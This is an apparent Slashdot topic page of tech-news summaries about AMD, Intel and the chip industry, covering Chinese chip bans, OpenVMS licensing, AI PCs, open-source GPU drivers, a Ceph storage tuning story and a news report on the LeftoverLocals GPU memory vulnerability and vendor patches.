Intel

China Tells Telecom Carriers To Phase Out Foreign Chips in Blow To Intel, AMD (wsj.com) 45

China's push to replace foreign technology is now focused on cutting American chip makers out of the country's telecoms systems. From a report: Officials earlier this year directed the nation's largest telecom carriers to phase out foreign processors that are core to their networks by 2027, a move that would hit American chip giants Intel and Advanced Micro Devices, people familiar with the matter said. The deadline given by China's Ministry of Industry and Information Technology aims to accelerate efforts by Beijing to halt the use of such core chips in its telecom infrastructure. The regulator ordered state-owned mobile operators to inspect their networks for the prevalence of non-Chinese semiconductors and draft timelines to replace them, the people said.

In the past, efforts to get the industry to wean itself off foreign semiconductors have been hindered by the lack of good domestically made chips. Chinese telecom carriers' procurements show they are switching more to domestic alternatives, a move made possible in part because local chips' quality has improved and their performance has become more stable, the people said. Such an effort will hit Intel and AMD the hardest, they said. The two chip makers have in recent years provided the bulk of the core processors used in networking equipment in China and the world.

Operating Systems

VMS Software Prunes OpenVMS Hobbyist Program (theregister.com) 60

Liam Proven reports via The Register: Bad news for those who want to play with OpenVMS in non-production use. Older versions are disappearing, and the terms are getting much more restrictive. The corporation behind the continued development of OpenVMS, VMS Software, Inc. -- or VSI to its friends, if it has any left after this -- has announced the latest Updates to the Community Program. The news does not look good: you can't get the Alpha and Itanium versions any more, only a limited x86-64 edition.

OpenVMS is one of the granddaddies of big serious OSes. A direct descendant of the OSes that inspired DOS, CP/M, OS/2, and Windows, as well as the native OS of the hardware on which Unix first went 32-bit, VMS has been around for nearly half a century. For decades, its various owners have offered various flavors of "hobbyist program" under which you could get licenses to install and run it for free, as long as it wasn't in production use. Since Compaq acquired DEC, then HP acquired Compaq, its prospects looked checkered. HP officially killed it off in 2013, then in 2014 granted it a reprieve and sold it off instead. New owner VSI ported it to x86-64, releasing that new version 9.2 in 2022. Around this time last year, we covered VSI adding AMD support and opening a hobbyist program of its own. It seems from the latest announcement that it has been disappointed by the reception: "Despite our initial aspirations for robust community engagement, the reality has fallen short of our expectations. The level of participation in activities such as contributing open source software, creating wiki articles, and providing assistance on forums has not matched the scale of the program. As a result, we find ourselves at a crossroads, compelled to reassess and recalibrate our approach."

Although HPE stopped offering hobbyist licenses for the original VAX versions of OpenVMS in 2020, VSI continued to maintain OpenVMS 8 (in other words, the Alpha and Itanium editions) while it worked on version 9 for x86-64. VSI even offered a Student Edition, which included a freeware Alpha emulator and a copy of OpenVMS 8.4 to run inside it. Those licenses run out in 2025, and they won't be renewed. If you have vintage DEC Alpha or HP Integrity boxes with Itanic chips, you won't be able to get a legal licensed copy of OpenVMS for them, or renew the license of any existing installations -- unless you pay, of course. There will still be a Community license edition, but from now on it's x86-64 only. Although OpenVMS 9 mainly targets hypervisors anyway, it does support bare-metal operations on a single model of HPE server, the ProLiant DL380 Gen10. If you have one of them to play with -- well, tough. Now Community users only get a VM image, supplied as a VMWare .vmdk file. It contains a ready-to-go "OpenVMS system disk with OpenVMS, compilers and development tools installed." Its license runs for a year, after which you will get a fresh copy. This means you won't be able to configure your own system and keep it alive -- you'll have to recreate it, from scratch, annually. The only alternative for those with older systems is to apply to be an OpenVMS Ambassador.

AMD

AMD To Open Source Micro Engine Scheduler Firmware For Radeon GPUs 23

AMD plans to document and open source its Micro Engine Scheduler (MES) firmware for GPUs, giving users more control over Radeon graphics cards. From a report: It's part of a larger effort AMD confirmed earlier this week about making its GPUs more open source at both a software level in respect to the ROCm stack for GPU programming and a hardware level. Details were scarce with this initial announcement, and the only concrete thing it introduced was a GitHub tracker.

However, yesterday AMD divulged more details, specifying that one of the things it would be making open source was the MES firmware for Radeon GPUs. AMD says it will be publishing documentation for MES around the end of May, and will then release the source code some time afterward. For one George Hotz and his startup, Tiny Corp, this is great news. Throughout March, Hotz had agitated for AMD to make MES open source in order to fix issues he was experiencing with his RX 7900 XTX-powered AI server box. He had talked several times to AMD representatives, and even the company's CEO, Lisa Su.
AI

AI Leaders Press Advantage With Congress as China Tensions Rise (nytimes.com) 14

Silicon Valley chiefs are swarming the Capitol to try to sway lawmakers on the dangers of falling behind in the AI race. From a report: In recent weeks, American lawmakers have moved to ban the Chinese-owned app TikTok. President Biden reinforced his commitment to overcome China's rise in tech. And the Chinese government added chips from Intel and AMD to a blacklist of imports. Now, as the tech and economic cold war between the United States and China accelerates, Silicon Valley's leaders are capitalizing on the strife with a lobbying push for their interests in another promising field of technology: artificial intelligence.

On May 1, more than 100 tech chiefs and investors, including Alex Karp, the head of the defense contractor Palantir, and Roelof Botha, the managing partner of the venture capital firm Sequoia Capital, will come to Washington for a daylong conference and private dinner focused on drumming up more hawkishness toward China's progress in A.I. Dozens of lawmakers, including Speaker Mike Johnson, Republican of Louisiana, will also attend the event, the Hill & Valley Forum, which will include fireside chats and keynote discussions with members of a new House A.I. task force.

Tech executives plan to use the event to directly lobby against A.I. regulations that they consider onerous, as well as ask for more government spending on the technology and research to support its development. They also plan to ask to relax immigration restrictions to bring more A.I. experts to the United States. The event highlights an unusual area of agreement between Washington and Silicon Valley, which have long clashed on topics like data privacy, children's online protections and even China.

Microsoft

Microsoft's New Era of AI PCs Will Need a Copilot Key, Says Intel (theverge.com) 127

An anonymous reader shares a report:Intel, Microsoft, Qualcomm, and AMD have all been pushing the idea of an "AI PC" for months now as we head toward more AI-powered features in Windows. While we're still waiting to hear the finer details from Microsoft on its big plans for AI in Windows, Intel has started sharing Microsoft's requirements for OEMs to build an AI PC -- and one of the main ones is that an AI PC must have Microsoft's Copilot key. Microsoft wants its OEM partners to provide a combination of hardware and software for its idea of an AI PC. That includes a system that comes with a Neural Processing Unit (NPU), the latest CPUs and GPUs, and access to Copilot. It will also need to have the new Copilot key that Microsoft announced earlier this year.

This requirement means that some laptops, like Asus' new ROG Zephyrus, have already shipped with Intel's new Core Ultra chips and aren't technically AI PCs in the eyes of Microsoft's strict requirements because they don't have a Copilot key. But they're still AI PCs in Intel's eyes. "Our joint aligned definition, Intel and Microsoft, we've aligned on Core Ultra, Copilot, and Copilot key," explains Todd Lewellen, head of the PC ecosystem at Intel, in a press briefing with The Verge. "From an Intel perspective our AI PC has Core Ultra and it has an integrated NPU because it is unlocking all kinds of new capabilities and functions in the AI space. We have great alignment with Microsoft, but there are going to be some systems out there that may not have the physical key on it but it does have our integrated NPU."

Windows

Microsoft Has a New Windows and Surface Chief (theverge.com) 16

Tom Warren reports via The Verge: Microsoft is naming Pavan Davuluri as its new Windows and Surface chief today. After Panos Panay's surprise departure to Amazon last year, Microsoft split up the Windows and Surface groups under two different leaders. Davuluri took over the Surface silicon and devices work, with Mikhail Parakhin leading a new team focused on Windows and web experiences. Now both Windows and Surface will be Davuluri's responsibility, as Parakhin has "decided to explore new roles."

The Verge has obtained an internal memo from Rajesh Jha, Microsoft's head of experiences and devices, outlining the new Windows organization. Microsoft is now bringing together its Windows and devices teams once more. "This will enable us to take a holistic approach to building silicon, systems, experiences, and devices that span Windows client and cloud for this AI era," explains Jha. Pavan Davuluri is now the leader of Microsoft's Windows and Surface team, reporting directly to Rajesh Jha. Davuluri has worked at Microsoft for more than 23 years and was deeply involved in the company's work with Qualcomm and AMD to create custom Surface processors.

Mikhail Parakhin will now report to Kevin Scott during a transition phase, but his future at Microsoft looks uncertain, and it's likely those "new roles" will be outside the company. Parakhin had been working closely on Bing Chat before taking on the broader Windows engineering responsibilities and changes to Microsoft Edge. The Windows shake-up comes just days after Google DeepMind co-founder and former Inflection AI CEO Mustafa Suleyman joined Microsoft as the CEO of a new AI team. Microsoft also hired a bunch of Inflection AI employees, including co-founder Karen Simonyan who is now the chief scientist of Microsoft AI.

Power

As AI Booms, Land Near Nuclear Power Plants Becomes Hot Real Estate 77

Tobias Mann reports via The Register: The land surrounding a nuclear power plant might not sound like prime real estate, but as more bit barns seek to trim costs, it's poised to become a rather hot commodity. All datacenters are energy-hungry but with more watt-greedy AI workloads on the horizon, nuclear power has fresh appeal, especially for hyperscalers. Such a shift in power also does wonders for greenwashing narratives around net-zero operations. While not technically renewable, nuclear power does have the benefit of being carbon-free, not to mention historically reliable -- with a few notable exceptions of course. All of these are purported benefits cited by startup NE Edge, which has been fighting for more than a year to be able to build a pair of AI datacenters adjacent to a 2GW Millstone nuclear power plant in Waterford, Connecticut.

According to the Hartford Courant, NE Energy has secured $1.6 billion to construct the switching station and bit barns, which will span 1.2 million square feet in total. NE Energy will reportedly spend an equivalent sum on between 25,000 and 35,000 servers. Considering the price of GPU systems from Nvidia, AMD, and Intel, we suspect that those figures probably refer to the number of GPUs. We've asked NE Edge for more information. NE Energy has faced local challenges getting the project approved because residents are concerned the project would end up increasing the cost of electricity. The facilities will reportedly consume as much as 13 percent of the plant's output. The project's president Thomas Quinn attempted to quell concerns, arguing that by connecting directly to the plants, NE Energy will be able to negotiate prices that make building such a power hungry facility viable in Connecticut. NE Energy has also committed to paying a 12.08 percent premium to the town on top of what it pays Dominion for power, along with other payments said to total more than $1 billion over the next 30 years. But after initially denying the sale of land to NE Edge back in January over a lack of information regarding the datacenter project, it's reported that the town council has yet to tell the company what information it is after.
China

China Blocks Use of Intel and AMD Chips in Government Computers (cnbc.com) 88

China has introduced new guidelines that will mean US microprocessors from Intel and AMD are phased out of government PCs and servers [Editor's note: the link may be paywalled; non-paywalled source], as Beijing ramps up a campaign to replace foreign technology with homegrown solutions. From a report: The stricter government procurement guidance also seeks to sideline Microsoft's Windows operating system and foreign-made database software in favour of domestic options. It runs alongside a parallel localisation drive under way in state-owned enterprises. The latest purchasing rules represent China's most significant step yet to build up domestic substitutes for foreign technology and echo moves in the US as tensions increase between the two countries. Washington has imposed sanctions on a growing number of Chinese companies on national security grounds, legislated to encourage more tech to be produced in the US and blocked exports of advanced chips and related tools to China.
Intel

Intel Awarded Up To $8.5 Billion in CHIPS Act Grants, With Billions More in Loans Available 29

The White House said Wednesday Intel has been awarded up to $8.5 billion in CHIPS Act funding, as the Biden administration ramps up its effort to bring semiconductor manufacturing to U.S. soil. From a report: Intel could receive an additional $11 billion in loans from the CHIPS and Science Act, which was passed in 2022. The awards will be announced by President Joe Biden in Arizona on Wednesday. The money will help "leading-edge semiconductors made in the United States" keep "America in the driver's seat of innovation," U.S. Secretary of Commerce Gina Raimondo said on a call with reporters. Intel and the White House said their agreement is nonbinding and preliminary and could change.

Intel has long been a stalwart of the U.S. semiconductor industry, developing chips that power many of the world's PCs and data center servers. However, the company has been eclipsed in revenue by Nvidia, which leads in artificial intelligence chips, and has been surpassed in market cap by rival AMD and mobile phone chipmaker Qualcomm.
AI

Jensen Huang Says Even Free AI Chips From Competitors Can't Beat Nvidia's GPUs 50

An anonymous reader shares a report: Nvidia CEO Jensen Huang recently took to the stage to claim that Nvidia's GPUs are "so good that even when the competitor's chips are free, it's not cheap enough." Huang further explained that Nvidia GPU pricing isn't really significant in terms of an AI data center's total cost of ownership (TCO). The impressive scale of Nvidia's achievements in powering the booming AI industry is hard to deny; the company recently became the world's third most valuable company thanks largely to its AI-accelerating GPUs, but Jensen's comments are sure to be controversial as he dismisses a whole constellation of competitors, such as AMD, Intel and a range of competitors with ASICs and other types of custom AI silicon.

Starting at 22:32 of the YouTube recording, John Shoven, Former Trione Director of SIEPR and the Charles R. Schwab Professor Emeritus of Economics, Stanford University, asks, "You make completely state-of-the-art chips. Is it possible that you'll face competition that claims to be good enough -- not as good as Nvidia -- but good enough and much cheaper? Is that a threat?" Jensen Huang begins his response by unpacking his tiny violin. "We have more competition than anyone on the planet," claimed the CEO. He told Shoven that even Nvidia's customers are its competitors, in some cases. Also, Huang pointed out that Nvidia actively helps customers who are designing alternative AI processors and goes as far as revealing to them what upcoming Nvidia chips are on the roadmap.
AMD

AMD Stops Certifying Monitors, TVs Under 144 Hz For FreeSync (arstechnica.com) 49

An anonymous reader quotes a report from Ars Technica: AMD announced this week that it has ceased FreeSync certification for monitors or TVs whose maximum refresh rates are under 144 Hz. Previously, FreeSync monitors and TVs could have refresh rates as low as 60 Hz, allowing for screens with lower price tags and ones not targeted at serious gaming to carry the variable refresh-rate technology. AMD also boosted the refresh-rate requirements for its higher AdaptiveSync tiers, FreeSync Premium and FreeSync Premium Pro, from 120 Hz to 200 Hz.

Here are the new minimum refresh-rate requirements for FreeSync, which haven't changed for laptops. AMD will continue supporting already-certified FreeSync displays even if they don't meet the above requirements. Interestingly, AMD's minimum refresh-rate requirements for TVs goes beyond 120 Hz, which many premium TVs max out at currently, due to the current-generation Xbox and PlayStation supporting max refresh rates of 120 frames per second (FPS). Announcing the changes this week in a blog post, Oguzhan Andic, AMD FreeSync and Radeon product marketing manager, claimed that the changes were necessary, noting that 60 Hz is no longer "considered great for gaming." Andic wrote that the majority of gaming monitors are 144 Hz or higher, compared to in 2015, when FreeSync debuted, and even 120 Hz was "a rarity."

AMD

Huawei's New CPU Matches Zen 3 In Single-Core Performance (tomshardware.com) 77

Long-time Slashdot reader AmiMoJo quotes Tom's Hardware: A Geekbench 6 result features what is likely the first-ever look at the single-core performance of the Taishan V120, developed by Huawei's HiSilicon subsidiary (via @Olrak29_ on X). The single-core score indicates that Taishan V120 cores are roughly on par with AMD's Zen 3 cores from late 2020, which could mean Huawei's technology isn't that far behind cutting-edge Western chip designers.

The Taishan V120 core was first spotted in Huawei's Kirin 9000s smartphone chip, which uses four of the cores alongside two efficiency-focused Arm Cortex A510 cores. Since Kirin 9000s chips are produced using SMIC's second-generation 7nm node (which may make it illegal to sell internationally according to U.S. lawmakers), it would also seem likely that the Taishan V120 core tested in Geekbench 6 is also made on the second-generation 7nm node.

The benchmark result doesn't really say much about what the actual CPU is, with the only hint being 'Huawei Cloud OpenStack Nova.' This implies it's a Kunpeng server CPU, which may either be the Kunpeng 916, 920, or 930. While we can only guess which one it is, it's almost certain to be the 930 given the high single-core performance shown in the result. By contrast, the few Geekbench 5 results for the Kunpeng 920 show it performing well behind AMD's first-generation Epyc Naples from 2017.

Microsoft

Microsoft is Working With Nvidia, AMD and Intel To Improve Upscaling Support in PC Games (theverge.com) 22

Microsoft has outlined a new Windows API designed to offer a seamless way for game developers to integrate super resolution AI-upscaling features from Nvidia, AMD, and Intel. From a report: In a new blog post, program manager Joshua Tucker describes Microsoft's new DirectSR API as the "missing link" between games and super resolution technologies, and says it should provide "a smoother, more efficient experience that scales across hardware."

"This API enables multi-vendor SR [super resolution] through a common set of inputs and outputs, allowing a single code path to activate a variety of solutions including Nvidia DLSS Super Resolution, AMD FidelityFX Super Resolution, and Intel XeSS," the post reads. The pitch seems to be that developers will be able to support this DirectSR API, rather than having to write code for each and every upscaling technology.

The blog post comes a couple of weeks after an "Automatic Super Resolution" feature was spotted in a test version of Windows 11, which promised to "use AI to make supported games play more smoothly with enhanced details." Now, it seems the feature will plug into existing super resolution technologies like DLSS, FSR, and XeSS rather than offering a Windows-level alternative.

IT

HDMI Forum Rejects Open-Source HDMI 2.1 Driver Support Sought By AMD (phoronix.com) 114

Michael Larabel, reporting at Phoronix: One of the limitations of AMD's open-source Linux graphics driver has been the inability to implement HDMI 2.1+ functionality on the basis of legal requirements by the HDMI Forum. AMD engineers had been working to come up with a solution in conjunction with the HDMI Forum for being able to provide HDMI 2.1+ capabilities with their open-source Linux kernel driver, but it looks like those efforts for now have concluded and failed. For three years there has been a bug report around 4K@120Hz being unavailable via HDMI 2.1 on the AMD Linux driver. Similarly, there have been bug reports like 5K @ 240Hz not possible either with the AMD graphics driver on Linux.

As covered back in 2021, the HDMI Forum closing public specification access is hurting open-source support. AMD as well as the X.Org Foundation have been engaged with the HDMI Forum to try to come up with a solution to be able to provide open-source implementations of the now-private HDMI specs. AMD Linux engineers have spent months working with their legal team and evaluating all HDMI features to determine if/how they can be exposed in their open-source driver. AMD had code working internally and then the past few months were waiting on approval from the HDMI Forum. Sadly, the HDMI Forum has turned down AMD's request for open-source driver support.

AMD

Despite Initial Claims, AMD Confirms Ryzen 8000G APUs Don't Support ECC RAM (tomshardware.com) 64

Slashdot reader ffkom shared this report from Tom's Hardware: When AMD formally introduced its Ryzen 8000G-series accelerated processing units for desktops in early January, the company mentioned that they supported ECC memory capability. Since then, the company has quietly removed mention of the technology from its website, as noted by Reddit users.

We asked AMD to clarify the situation and were told that the company has indeed removed mentions of ECC technology from the specifications of its Ryzen 3 8300G, Ryzen 5 8500G, Ryzen 5 8600G, and Ryzen 5 8700G. The technology also cannot be enabled on motherboards, so it looks like these processors indeed do not support ECC technology at all.

While it would be nice to have ECC support on AMD's latest consumer Ryzen 8000G APUs, this is a technology typically reserved for AMD's Ryzen Pro processors.

Open Source

AMD's CUDA Implementation Built On ROCm Is Now Open Source (phoronix.com) 29

Michael Larabel writes via Phoronix: While there have been efforts by AMD over the years to make it easier to port codebases targeting NVIDIA's CUDA API to run atop HIP/ROCm, it still requires work on the part of developers. The tooling has improved such as with HIPIFY to help in auto-generating but it isn't any simple, instant, and guaranteed solution -- especially if striving for optimal performance. Over the past two years AMD has quietly been funding an effort though to bring binary compatibility so that many NVIDIA CUDA applications could run atop the AMD ROCm stack at the library level -- a drop-in replacement without the need to adapt source code. In practice for many real-world workloads, it's a solution for end-users to run CUDA-enabled software without any developer intervention. Here is more information on this "skunkworks" project that is now available as open-source along with some of my own testing and performance benchmarks of this CUDA implementation built for Radeon GPUs. [...]

For those wondering about the open-source code, it's dual-licensed under either Apache 2.0 or MIT. Rust fans will be excited to know the Rust programming language is leveraged for this Radeon implementation. [...] Those wanting to check out the new ZLUDA open-source code for Radeon GPUs can do so via GitHub.

Microsoft

Microsoft Working On Its Own DLSS-like Upscaler for Windows 11 (theverge.com) 42

Microsoft appears to be readying its own DLSS-like AI upscaling feature for PC games. From a report: X user PhantomOcean3 discovered the feature inside the latest test versions of Windows 11 over the weekend, with Microsoft describing its automatic super resolution as a way to "use AI to make supported games play more smoothly with enhanced details." That sounds a lot like Nvidia's Deep Learning Super Sampling (DLSS) technology, which uses AI to upscale games and improve frame rates and image quality. AMD and Intel also offer their own variants, with FSR and XeSS both growing in popularity in recent PC game releases.
AI

AI PCs To Account for Nearly 60% of All PC Shipments by 2027, IDC Says (idc.com) 70

IDC, in a press release: A new forecast from IDC shows shipments of artificial intelligence (AI) PCs -- personal computers with specific system-on-a-chip (SoC) capabilities designed to run generative AI tasks locally -- growing from nearly 50 million units in 2024 to more than 167 million in 2027. By the end of the forecast, IDC expects AI PCs will represent nearly 60% of all PC shipments worldwide. [...] Until recently, running an AI task locally on a PC was done on the central processing unit (CPU), the graphics processing unit (GPU), or a combination of the two. However, this can have a negative impact on the PC's performance and battery life because these chips are not optimized to run AI efficiently. PC silicon vendors have now introduced AI-specific silicon to their SoCs called neural processing units (NPUs) that run these tasks more efficiently.

To date, IDC has identified three types of NPU-enabled AI PCs:
1. Hardware-enabled AI PCs include an NPU that offers less than 40 tera operations per second (TOPS) performance and typically enables specific AI features within apps to run locally. Qualcomm, Apple, AMD, and Intel are all shipping chips in this category today.

2. Next-generation AI PCs include an NPU with 40 to 60 TOPS performance and an AI-first operating system (OS) that enables persistent and pervasive AI capabilities in the OS and apps. Qualcomm, AMD, and Intel have all announced future chips for this category, with delivery expected to begin in 2024. Microsoft is expected to roll out major updates (and updated system specifications) to Windows 11 to take advantage of these high-TOPS NPUs.

3. Advanced AI PCs are PCs that offer more than 60 TOPS of NPU performance. While no silicon vendors have announced such products, IDC expects them to appear in the coming years. This IDC forecast does not include advanced AI PCs, but they will be incorporated into future updates.
Michael Dell, commenting on X: This is correct and might be underestimating it. AI PCs are coming fast and Dell is ready.
Networking

Ceph: a Journey To 1 TiB/s (ceph.io) 16

It's "a free and open-source, software-defined storage platform," according to Wikipedia, providing object storage, block storage, and file storage "built on a common distributed cluster foundation". The charter advisory board for Ceph included people from Canonical, CERN, Cisco, Fujitsu, Intel, Red Hat, SanDisk, and SUSE.

And Nite_Hawk (Slashdot reader #1,304) is one of its core engineers — a former Red Hat principal software engineer named Mark Nelson. (He's now leading R&D for a small cloud systems company called Clyso that provides Ceph consulting.) And he's returned to Slashdot to share a blog post describing "a journey to 1 TiB/s". This gnarly tale-from-Production starts while assisting Clyso with "a fairly hip and cutting edge company that wanted to transition their HDD-backed Ceph cluster to a 10 petabyte NVMe deployment" using object-based storage devices [or OSDs]...) I can't believe they figured it out first. That was the thought going through my head back in mid-December after several weeks of 12-hour days debugging why this cluster was slow... Half-forgotten superstitions from the 90s about appeasing SCSI gods flitted through my consciousness...

Ultimately they decided to go with a Dell architecture we designed, which quoted at roughly 13% cheaper than the original configuration despite having several key advantages. The new configuration has less memory per OSD (still comfortably 12GiB each), but faster memory throughput. It also provides more aggregate CPU resources, significantly more aggregate network throughput, a simpler single-socket configuration, and utilizes the newest generation of AMD processors and DDR5 RAM. By employing smaller nodes, we halved the impact of a node failure on cluster recovery....

The initial single-OSD test looked fantastic for large reads and writes and showed nearly the same throughput we saw when running FIO tests directly against the drives. As soon as we ran the 8-OSD test, however, we observed a performance drop. Subsequent single-OSD tests continued to perform poorly until several hours later when they recovered. So long as a multi-OSD test was not introduced, performance remained high. Confusingly, we were unable to invoke the same behavior when running FIO tests directly against the drives. Just as confusing, we saw that during the 8 OSD test, a single OSD would use significantly more CPU than the others. A wallclock profile of the OSD under load showed significant time spent in io_submit, which is what we typically see when the kernel starts blocking because a drive's queue becomes full...

For over a week, we looked at everything from bios settings, NVMe multipath, low-level NVMe debugging, changing kernel/Ubuntu versions, and checking every single kernel, OS, and Ceph setting we could think of. None these things fully resolved the issue. We even performed blktrace and iowatcher analysis during "good" and "bad" single OSD tests, and could directly observe the slow IO completion behavior. At this point, we started getting the hardware vendors involved. Ultimately it turned out to be unnecessary. There was one minor, and two major fixes that got things back on track.

It's a long blog post, but here's where it ends up:
  • Fix One: "Ceph is incredibly sensitive to latency introduced by CPU c-state transitions. A quick check of the bios on these nodes showed that they weren't running in maximum performance mode which disables c-states."
  • Fix Two: [A very clever engineer working for the customer] "ran a perf profile during a bad run and made a very astute discovery: A huge amount of time is spent in the kernel contending on a spin lock while updating the IOMMU mappings. He disabled IOMMU in the kernel and immediately saw a huge increase in performance during the 8-node tests." In a comment below, Nelson adds that "We've never seen the IOMMU issue before with Ceph... I'm hoping we can work with the vendors to understand better what's going on and get it fixed without having to completely disable IOMMU."
  • Fix Three: "We were not, in fact, building RocksDB with the correct compile flags... It turns out that Canonical fixed this for their own builds as did Gentoo after seeing the note I wrote in do_cmake.sh over 6 years ago... With the issue understood, we built custom 17.2.7 packages with a fix in place. Compaction time dropped by around 3X and 4K random write performance doubled."

The story has a happy ending, with performance testing eventually showing data being read at 635 GiB/s — and a colleague daring them to attempt 1 TiB/s. They built a new testing configuration targeting 63 nodes — achieving 950GiB/s — then tried some more performance optimizations...


Security

A Flaw In Millions of Apple, AMD, and Qualcomm GPUs Could Expose AI Data (wired.com) 22

An anonymous reader quotes a report from Wired: As more companies ramp up development of artificial intelligence systems, they are increasingly turning to graphics processing unit (GPU) chips for the computing power they need to run large language models (LLMs) and to crunch data quickly at massive scale. Between video game processing and AI, demand for GPUs has never been higher, and chipmakers are rushing to bolster supply. In new findings released today, though, researchers are highlighting a vulnerability in multiple brands and models of mainstream GPUs -- including Apple, Qualcomm, and AMD chips -- that could allow an attacker to steal large quantities of data from a GPU's memory. The silicon industry has spent years refining the security of central processing units, or CPUs, so they don't leak data in memory even when they are built to optimize for speed. However, since GPUs were designed for raw graphics processing power, they haven't been architected to the same degree with data privacy as a priority. As generative AI and other machine learning applications expand the uses of these chips, though, researchers from New York -- based security firm Trail of Bits say that vulnerabilities in GPUs are an increasingly urgent concern. "There is a broader security concern about these GPUs not being as secure as they should be and leaking a significant amount of data," Heidy Khlaaf, Trail of Bits' engineering director for AI and machine learning assurance, tells WIRED. "We're looking at anywhere from 5 megabytes to 180 megabytes. In the CPU world, even a bit is too much to reveal."

To exploit the vulnerability, which the researchers call LeftoverLocals, attackers would need to already have established some amount of operating system access on a target's device. Modern computers and servers are specifically designed to silo data so multiple users can share the same processing resources without being able to access each others' data. But a LeftoverLocals attack breaks down these walls. Exploiting the vulnerability would allow a hacker to exfiltrate data they shouldn't be able to access from the local memory of vulnerable GPUs, exposing whatever data happens to be there for the taking, which could include queries and responses generated by LLMs as well as the weights driving the response. In their proof of concept, as seen in the GIF below, the researchers demonstrate an attack where a target -- shown on the left -- asks the open source LLM Llama.cpp to provide details about WIRED magazine. Within seconds, the attacker's device -- shown on the right -- collects the majority of the response provided by the LLM by carrying out a LeftoverLocals attack on vulnerable GPU memory. The attack program the researchers created uses less than 10 lines of code. [...] Though exploiting the vulnerability would require some amount of existing access to targets' devices, the potential implications are significant given that it is common for highly motivated attackers to carry out hacks by chaining multiple vulnerabilities together. Furthermore, establishing "initial access" to a device is already necessary for many common types of digital attacks.
The researchers did not find evidence that Nvidia, Intel, or Arm GPUs contain the LeftoverLocals vulnerability, but Apple, Qualcomm, and AMD all confirmed to WIRED that they are impacted. Here's what each of the affected companies had to say about the vulnerability, as reported by Wired:

Apple: An Apple spokesperson acknowledged LeftoverLocals and noted that the company shipped fixes with its latest M3 and A17 processors, which it unveiled at the end of 2023. This means that the vulnerability is seemingly still present in millions of existing iPhones, iPads, and MacBooks that depend on previous generations of Apple silicon. On January 10, the Trail of Bits researchers retested the vulnerability on a number of Apple devices. They found that Apple's M2 MacBook Air was still vulnerable, but the iPad Air 3rd generation A12 appeared to have been patched.
Qualcomm: A Qualcomm spokesperson told WIRED that the company is "in the process" of providing security updates to its customers, adding, "We encourage end users to apply security updates as they become available from their device makers." The Trail of Bits researchers say Qualcomm confirmed it has released firmware patches for the vulnerability.
AMD: AMD released a security advisory on Wednesday detailing its plans to offer fixes for LeftoverLocals. The protections will be "optional mitigations" released in March.
Google: For its part, Google says in a statement that it "is aware of this vulnerability impacting AMD, Apple, and Qualcomm GPUs. Google has released fixes for ChromeOS devices with impacted AMD and Qualcomm GPUs."

Slashdot Top Deals